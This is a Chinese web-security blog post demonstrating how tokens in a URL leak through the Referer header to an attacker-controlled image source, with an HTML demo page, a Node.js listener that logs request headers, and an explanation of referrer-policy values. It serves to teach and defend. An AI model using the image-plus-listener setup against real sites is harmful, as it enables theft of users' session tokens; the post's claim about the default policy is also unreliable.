<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="前言 在我们日常漏洞挖掘的过程中，可能会碰见数据包中的referer带有一些信息的情况，如token、sessionid,key和phoneNumber等，对于这些信息，我们如何去窃取呢？这里可以使用img标签去进行信息的窃取。 场景如下： A为url，其值为https:&#x2F;&#x2F;test.com&#x2F;index.html?token&#x3D;xxxxxx，当我们访问A时进入到的页面为B，B的html中有一个&amp;lt">
<meta property="og:type" content="article">
<meta property="og:title" content="数据包referrer头中敏感信息的窃取">
<meta property="og:url" content="https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/index.html">
<meta property="og:site_name" content="X2n.">
<meta property="og:description" content="前言 在我们日常漏洞挖掘的过程中，可能会碰见数据包中的referer带有一些信息的情况，如token、sessionid,key和phoneNumber等，对于这些信息，我们如何去窃取呢？这里可以使用img标签去进行信息的窃取。 场景如下： A为url，其值为https:&#x2F;&#x2F;test.com&#x2F;index.html?token&#x3D;xxxxxx，当我们访问A时进入到的页面为B，B的html中有一个&amp;lt">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/image-20250506143443451.png">
<meta property="og:image" content="https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/image-20250506144151403.png">
<meta property="article:published_time" content="2025-05-06T05:23:03.000Z">
<meta property="article:modified_time" content="2025-05-06T07:42:10.271Z">
<meta property="article:author" content="X2n.">
<meta property="article:tag" content="Referer-Policy">
<meta property="article:tag" content="信息泄露">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/image-20250506143443451.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>数据包referrer头中敏感信息的窃取</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="X2n." type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/tags/">Tag</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2025/05/11/%E6%9A%97%E6%9C%88%E9%A1%B9%E7%9B%AE%E5%85%AD%E5%86%85%E7%BD%91%E5%9F%9F%E6%B8%97%E9%80%8F%E7%AC%94%E8%AE%B0/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/05/02/%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C%E7%AC%94%E8%AE%B0/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&text=数据包referrer头中敏感信息的窃取"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&is_video=false&description=数据包referrer头中敏感信息的窃取"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=数据包referrer头中敏感信息的窃取&body=Check out this article: https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&title=数据包referrer头中敏感信息的窃取"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&name=数据包referrer头中敏感信息的窃取&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://x2nn.github.io/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/&t=数据包referrer头中敏感信息的窃取"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%89%8D%E8%A8%80"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%94%BB%E5%87%BB%E5%9C%BA%E6%99%AF%E6%BC%94%E7%A4%BA"><span class="toc-number">2.</span> <span class="toc-text">攻击场景演示</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Referrer-policy"><span class="toc-number">3.</span> <span class="toc-text">Referrer-policy</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#referrer-policy-%E7%9A%84%E5%8F%96%E5%80%BC"><span class="toc-number">3.1.</span> <span class="toc-text">referrer-policy 的取值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A6%82%E4%BD%95%E8%AE%BE%E7%BD%AE-referrer-policy%EF%BC%9F"><span class="toc-number">3.2.</span> <span class="toc-text">如何设置 referrer-policy？</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        数据包referrer头中敏感信息的窃取
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">X2n.</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-05-06T05:23:03.000Z" class="dt-published" itemprop="datePublished">2025-05-06</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web%E5%AE%89%E5%85%A8/">Web安全</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Referer-Policy/" rel="tag">Referer-Policy</a>, <a class="p-category" href="/tags/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/" rel="tag">信息泄露</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="前言">前言</h2>
<p>在我们日常漏洞挖掘的过程中，可能会碰见数据包中的<code>referer</code>带有一些信息的情况，如<code>token</code>、<code>sessionid</code>,<code>key</code>和<code>phoneNumber</code>等，对于这些信息，我们如何去窃取呢？这里可以使用<code>img</code>标签去进行信息的窃取。</p>
<p><strong>场景如下：</strong></p>
<p><code>A</code>为<code>url</code>，其值为<code>https://test.com/index.html?token=xxxxxx</code>，当我们访问<code>A</code>时进入到的页面为<code>B</code>，<code>B</code>的<code>html</code>中有一个<code>&lt;img&gt;</code>标签，这个标签的<code>src</code>属性是我们可以随意控制的，且这个<code>B</code>页面启用了<code>unsafe-url</code>。</p>
<p>默认情况下，<code>unsafe-url</code>是不启用的，不启用时默认<code>referer</code>的内容为<strong>协议、主机名和端口</strong>，不携带参数，这是<code>Referrer Policy</code>，后面我会提到。</p>
<p><strong>真实环境场景：</strong></p>
<p>一切<code>&lt;img&gt;</code>标签的<code>src</code>属性可控的点都有可能。</p>
<p>例如：</p>
<ul>
<li>论坛站点，用户的头像<code>url</code>可控，对应于<code>img</code>中的<code>src</code>可控。</li>
<li>视频播放站点，存在评论区，用户头像<code>url</code>可控。</li>
</ul>
<h2 id="攻击场景演示">攻击场景演示</h2>
<blockquote>
<p>攻击效果： 受害者会带着自己的<code>token</code>，就是这里的<code>A</code>，访问到页面<code>B</code>，<code>B</code>中的<code>img</code>标签的<code>src</code>属性我们可控，设置为攻击者监听数据包的脚本，监听的数据包中包含有敏感信息的<code>referer</code>，进而实现信息的窃取。</p>
</blockquote>
<p>下面来演示一下敏感信息的窃取。</p>
<ul>
<li><code>A</code>为<code>URL</code>：<code>http://127.0.0.1:3000/index.html?token=xxxxxx</code></li>
<li><code>B</code>为这个<code>index.html</code>页面，其中<code>img</code>标签的<code>src</code>属性我们可控，其页面启用了<code>unsafe-url</code>。</li>
</ul>
<p><code>B</code>的<code>index.html</code>页面如下，其中的<code>http://127.0.0.1:3001/logo.png</code>为攻击者嵌入的监听数据包脚本。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;referrer&quot;</span> <span class="attr">content</span>=<span class="string">&quot;unsafe-url&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>Logo<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Logo Picture<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;http://127.0.0.1:3001/logo.png&quot;</span> <span class="attr">alt</span>=<span class="string">&quot;Logo Picture&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>这个<code>http://127.0.0.1:3001/logo.png</code>的后端<code>nodejs</code>脚本<code>main.js</code>如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> http = <span class="built_in">require</span>(<span class="string">&#x27;http&#x27;</span>);</span><br><span class="line"><span class="keyword">const</span> url = <span class="built_in">require</span>(<span class="string">&#x27;url&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> hostname = <span class="string">&#x27;0.0.0.0&#x27;</span>; <span class="comment">// 监听所有可用的网络接口</span></span><br><span class="line"><span class="keyword">const</span> port = <span class="number">3001</span>; <span class="comment">// 您希望服务器监听的端口</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> server = http.<span class="title function_">createServer</span>(<span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">  <span class="keyword">const</span> parsedUrl = url.<span class="title function_">parse</span>(req.<span class="property">url</span>, <span class="literal">true</span>);</span><br><span class="line">  <span class="keyword">const</span> pathname = parsedUrl.<span class="property">pathname</span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (pathname === <span class="string">&#x27;/logo.png&#x27;</span>) &#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;-------------------- 请求详情 --------------------&#x27;</span>);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`请求方法: <span class="subst">$&#123;req.method&#125;</span>`</span>);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`请求 URL: <span class="subst">$&#123;req.url&#125;</span>`</span>);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;请求头:&#x27;</span>);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(req.<span class="property">headers</span>);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&#x27;--------------------------------------------------&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    res.<span class="title function_">writeHead</span>(<span class="number">200</span>, &#123; <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;image/png&#x27;</span> &#125;);</span><br><span class="line">    <span class="comment">// 在这里您可以实际读取并返回一个 logo.png 文件</span></span><br><span class="line">    <span class="comment">// 为了演示，我们发送一个简单的透明像素 GIF</span></span><br><span class="line">    <span class="keyword">const</span> transparentPixel = <span class="title class_">Buffer</span>.<span class="title function_">from</span>(<span class="string">&#x27;R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7&#x27;</span>, <span class="string">&#x27;base64&#x27;</span>);</span><br><span class="line">    res.<span class="title function_">end</span>(transparentPixel);</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    res.<span class="title function_">writeHead</span>(<span class="number">404</span>, &#123; <span class="string">&#x27;Content-Type&#x27;</span>: <span class="string">&#x27;text/plain&#x27;</span> &#125;);</span><br><span class="line">    res.<span class="title function_">end</span>(<span class="string">&#x27;Not Found&#x27;</span>);</span><br><span class="line">  &#125;</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">server.<span class="title function_">listen</span>(port, hostname, <span class="function">() =&gt;</span> &#123;</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`服务器运行在 http://<span class="subst">$&#123;hostname&#125;</span>:<span class="subst">$&#123;port&#125;</span>/`</span>);</span><br><span class="line">  <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`请访问 http://<span class="subst">$&#123;hostname&#125;</span>:<span class="subst">$&#123;port&#125;</span>/logo.png 查看请求详情。`</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>
<p>攻击者在自己的<code>vps</code>上运行脚本<code>main.js</code>，受害者访问到的页面为``<a target="_blank" rel="noopener" href="http://127.0.0.1:3000/index.html%60%E3%80%82">http://127.0.0.1:3000/index.html`。</a></p>
<p>本地使用<code>python</code>启动一个<code>HTTP</code>服务，模拟受害者访问的页面。</p>
<p>在<code>index.html</code>同目录下执行命令<code>python -m http.server 3000</code>，此时攻击者<code>node main.js</code>启动监听脚本。</p>
<p>此时受害者访问到<code>A</code>，受害者的<code>token</code>成功被攻击者窃取。</p>
<p><img src="/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/image-20250506143443451.png" alt="image-20250506143443451"></p>
<p>再来看一下不启用<code>unsafe-url</code>的情况。</p>
<p>修改<code>index.html</code>为<code>index2.html</code>如下，切换为默认情况。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--&lt;meta name=&quot;referrer&quot; content=&quot;unsafe-url&quot;&gt;--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">title</span>&gt;</span>Logo<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">h1</span>&gt;</span>Logo Picture<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">img</span> <span class="attr">src</span>=<span class="string">&quot;http://127.0.0.1:3001/logo.png&quot;</span> <span class="attr">alt</span>=<span class="string">&quot;Logo Picture&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>此时访问<code>http://localhost:3000/index2.html?token=xxxxx</code>，这里发现<code>referer</code>中的<code>token</code>就会消失了。此处测试使用的浏览器为Chrome 135.0.7049.115（正式版本） (arm64)。出现这种情况是由于<code>referrer-policy</code>的关系。</p>
<p><img src="/2025/05/06/%E6%95%B0%E6%8D%AE%E5%8C%85referer%E5%A4%B4%E4%B8%AD%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E7%9A%84%E7%AA%83%E5%8F%96/image-20250506144151403.png" alt="image-20250506144151403"></p>
<h2 id="Referrer-policy">Referrer-policy</h2>
<p>介绍一下 <code>referrer-policy</code>。它是一个 HTTP 头部，用于控制在用户导航到其他网页时，浏览器在 HTTP 请求的 <code>Referer</code> 头部中发送哪些信息。<code>Referer</code> 头部包含了前一个页面的 URL，这对于分析用户来源、安全性和内容定制等方面非常有用。然而，出于隐私和安全考虑，开发者可能需要限制甚至完全阻止 <code>Referer</code> 信息的发送。<code>referrer-policy</code> 就是为了实现这种控制而生的。</p>
<p><strong>为什么需要 <code>referrer-policy</code>？</strong></p>
<ul>
<li><strong>隐私保护:</strong> 有些页面的 URL 可能包含用户的敏感信息（例如，会话 ID、用户名等）。不加限制地发送 <code>Referer</code> 可能会泄露这些信息给第三方网站。</li>
<li><strong>安全性:</strong> 恶意网站可能会利用 <code>Referer</code> 信息进行某些攻击，例如跨站请求伪造（CSRF）的变种。</li>
<li><strong>数据分析的精细化控制:</strong> 开发者可能希望更精确地控制哪些来源信息可以被分析工具收集。</li>
</ul>
<h3 id="referrer-policy-的取值"><code>referrer-policy</code> 的取值</h3>
<p><code>referrer-policy</code> 头部可以设置多个不同的值，这些值定义了在不同场景下 <code>Referer</code> 头部应该如何发送。</p>
<p>以下是一些常见的取值及其含义：</p>
<ul>
<li><strong><code>no-referrer</code>:</strong> 这是最严格的策略。无论在任何情况下，都不会发送 <code>Referer</code> 头部。</li>
<li><strong><code>no-referrer-when-downgrade</code>:</strong> 这是默认策略。只有在从 <code>HTTPS</code> 页面导航到 <code>HTTP</code> 页面时，才会不发送 <code>Referer</code> 头部。在其他情况下（例如，<code>HTTPS</code> 到 <code>HTTPS</code>，<code>HTTP</code> 到 <code>HTTP</code>，<code>HTTP</code> 到 <code>HTTPS</code>），会发送完整的来源 <code>URL</code>。这个策略旨在防止 <code>HTTPS</code> 页面上的敏感信息通过不安全的 <code>HTTP</code> 连接泄露。</li>
<li><strong><code>same-origin</code>:</strong> 只有当目标网站与当前网站具有相同的源（协议、域名和端口都相同）时，才会发送完整的 <code>Referer</code> 头部。对于跨域请求，不会发送 <code>Referer</code> 头部。</li>
<li><strong><code>origin</code>:</strong> 在任何情况下，都会发送来源的协议和主机名（不包含路径和查询字符串）。例如，如果当前页面是 <code>https://example.com/page.html</code>，那么 <code>Referer</code> 头部的值将是 <code>https://example.com/</code>。</li>
<li><strong><code>strict-origin</code>:</strong> 与 <code>origin</code> 类似，但在从 HTTPS 页面导航到 HTTP 页面时，不会发送 <code>Referer</code> 头部。</li>
<li><strong><code>origin-when-cross-origin</code>:</strong> 对于同源请求，发送完整的 <code>Referer</code> 头部。对于跨域请求，只发送来源的协议和主机名。</li>
<li><strong><code>strict-origin-when-cross-origin</code>:</strong> 对于同源请求，发送完整的 <code>Referer</code> 头部。对于跨域请求，只发送来源的协议和主机名。并且在从 HTTPS 页面导航到 HTTP 页面时，不会发送 <code>Referer</code> 头部。</li>
<li><strong><code>unsafe-url</code>:</strong> 这是最宽松的策略。无论在任何情况下，都会发送完整的 <code>Referer</code> 头部，包括协议、主机名、路径和查询字符串。<strong>强烈建议避免使用此策略</strong>，因为它可能会暴露敏感信息。</li>
</ul>
<h3 id="如何设置-referrer-policy？">如何设置 <code>referrer-policy</code>？</h3>
<p>设置 <code>referrer-policy</code> 有几种方式：</p>
<ol>
<li><strong>HTTP 头部:</strong> 这是最常用和推荐的方式。服务器在 HTTP 响应头中添加 <code>Referrer-Policy</code> 字段并设置相应的值。例如：</li>
</ol>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">Referrer-Policy</span><span class="punctuation">: </span>strict-origin-when-cross-origin</span><br></pre></td></tr></table></figure>
<ol start="2">
<li><strong>HTML <code>&lt;meta&gt;</code> 标签:</strong> 在 HTML 文档的 <code>&lt;head&gt;</code> 部分使用 <code>&lt;meta&gt;</code> 标签设置 <code>referrer-policy</code>：</li>
</ol>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">meta</span> <span class="attr">name</span>=<span class="string">&quot;referrer&quot;</span> <span class="attr">content</span>=<span class="string">&quot;strict-origin-when-cross-origin&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<ol start="3">
<li><strong>HTML 元素的 <code>referrerpolicy</code> 属性:</strong> 为特定的 <code>&lt;a&gt;</code>, <code>&lt;area&gt;</code>, 和 <code>&lt;form&gt;</code> 元素设置 <code>referrerpolicy</code> 属性，覆盖全局设置：</li>
</ol>
